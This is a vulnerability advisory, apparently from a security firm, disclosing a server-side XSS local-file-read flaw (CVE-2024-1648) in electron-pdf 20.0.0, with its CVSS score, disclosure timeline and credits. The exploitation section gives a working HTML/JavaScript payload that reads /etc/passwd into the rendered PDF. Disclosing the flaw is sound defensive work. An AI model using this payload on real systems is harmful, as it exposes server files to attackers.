electron-pdf 20.0.0 - Local File Read

Summary

Nameelectron-pdf 20.0.0 - Local File Read
Code name
Productelectron-pdf
Affected versionsVersion 20.0.0
StatePublic
Release date2024-02-19

Vulnerability

KindServer Side XSS
Rule
RemoteYes
CVSSv3.1 VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSSv3.1 Base Score7.5
Exploit availableYes
CVE ID(s)

Description

electron-pdf version 20.0.0 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the HTML content entered by the user.

Vulnerability

This vulnerability occurs because the application does not validate that the HTML content entered by the user is not malicious.

Exploitation

To exploit this vulnerability, we only need to send the following malicious HTML to electron-pdf:

Exploit.html

<script> x=new XMLHttpRequest; x.onload=function(){document.write(this.responseText)}; x.open("GET","file:///etc/passwd");x.send(); </script>

Thus, when electron-pdf parses the malicious HTML, it will return the local file specified in the generated PDF.

Evidence of exploitation

LFR-Node-PDF

LFR-Node-PDF

Our security policy

We have reserved the ID CVE-2024-1648 to refer to this issue from now on.

System Information

  • Version: electron-pdf 20.0.0

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://www.npmjs.com/package/electron-pdf/

Timeline

Time-lapse-logo

2024-02-05

Vulnerability discovered.

Time-lapse-logo

2024-02-05

Vendor contacted.

Time-lapse-logo

2024-02-19

Public Disclosure.

Fluid Logo Footer

Hacking software for over 20 years

Fluid Attacks tests applications and other systems, covering all software development stages. Our team assists clients in quickly identifying and managing vulnerabilities to reduce the risk of incidents and deploy secure technology.

Copyright © 0 Fluid Attacks. We hack your software. All rights reserved.